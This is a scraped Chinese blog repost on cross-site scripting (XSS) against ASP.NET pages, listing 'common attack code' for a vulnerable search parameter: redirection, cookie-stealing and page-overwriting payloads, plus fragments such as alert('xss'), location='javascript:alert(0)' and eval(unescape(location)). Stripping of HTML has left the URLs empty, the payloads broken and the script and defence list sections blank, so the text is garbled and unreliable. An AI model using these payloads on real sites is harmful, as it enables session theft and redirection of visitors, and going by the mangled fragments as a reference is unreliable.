博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Asp.net跨站脚本攻击XSS实例分享
阅读量:6838 次
发布时间:2019-06-26

本文共 849 字,大约阅读时间需要 2 分钟。



Asp.net跨站脚本攻击XSS实例分享

常用攻击代码:

http://target/vuln-search.aspx?term=  Redirection Attack http://target/vuln-search.aspx?term=  Cookie stealing http://target/vuln-search.aspx?term=   where 'xss.js' could contain a snippet that overwrites the entire document's HTML body. i.e.: document.body.innerHTML = 'since we can now insert brakets without having to escape the request filtering, we\'re free to insert any HTML tags
    
     
     
     
     
     
    
'; 
     
      
      
      
     
     
      
      
      
     
alert('xss');location='javascript:alert(0)';location=name;http://site.com/?p=";eval(unescape(location))//#%0Aalert(0)testtest{alert('xss')}";document.write('');"";document.write('');"alert(1)">hola等等

XSS脚本列表:

防御XSS列表:

部分实例分享:

其他实例:



转载地址:http://pqhkl.baihongyu.com/

你可能感兴趣的文章
这才是我想要的云盘工具
查看>>
iOS6.0下获取通讯录用户列表
查看>>
8个实用的响应式设计框架
查看>>
Objective-C中的内存管理
查看>>
Docker监控方案(TIG)的研究与实践之Grafana
查看>>
php 通过stomp协议连接ActiveMQ
查看>>
epoll 或者 kqueue 的原理是什么?
查看>>
JNDI数据库连接池的配置
查看>>
How Does Maven Work
查看>>
设计模式六大原则(6):开闭原则
查看>>
《Netty In Action》第二章:第一个Netty程序
查看>>
为什么不需要对独立的jre进行环境变量配置
查看>>
策略模式
查看>>
通过tomcat实现多域名配置
查看>>
JAVA实现环形缓冲多线程读取远程文件
查看>>
#Note# 极客与团队-软件工程师的生存秘笈
查看>>
redis的观察者模式----------发布订阅功能
查看>>
JDBC连接SQLserver2008,使用jdk为1.7 [个人新浪微博]
查看>>
ps、磨皮、修改图片
查看>>
SpringCloud动态刷新配置信息
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-31 19:59:12   当前IP: 18.117.8.84   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我